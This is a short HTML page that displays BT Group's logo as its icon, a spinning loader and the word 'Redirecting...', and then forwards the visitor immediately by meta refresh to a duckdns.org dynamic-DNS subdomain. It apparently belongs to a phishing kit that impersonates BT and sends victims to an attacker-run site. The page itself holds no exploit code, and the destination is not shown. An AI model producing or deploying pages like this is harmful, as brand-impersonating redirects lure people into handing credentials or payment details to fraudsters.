
 
<html>

<head>
    <meta charset="UTF-8">
    <link rel="shortout icon" href="favicon.ico"/>
    
    
<link rel="icon" href="https://seeklogo.com/images/B/bt-group-logo-3AC4F5FF63-seeklogo.com.png">


    </head>
    <style>
        
        .logo{
            
            text-indent: -99999999px;
            background: url('logo.svg');
            width: 128px;
            height: 32px;
            
        }
        .loader{
             position: absolute;
    left: 45%;
    top: 40%;
            border:16px solid #efefed;
            border-radius: 50%;
            border-top: 16px solid #7f00ff;
            width: 100px;
            height: 100px;
            animation: spin 2s linear infinite;
            
        }
        @keyframes spin {
            0% { transform: rotate(0deg);}
            100% {transform: rotate(360deg);}
        }
    .myclass {
    position:absolute;
    left: 44%;
    top:65%;
}
    </style>
    
<body>
    
    <div class="loader"></div>
        <div class="myclass">Redirecting...</div>


    
    </body>
   <meta http-equiv="refresh" content="0;https://mcmertinyabsa.duckdns.org/">
</html>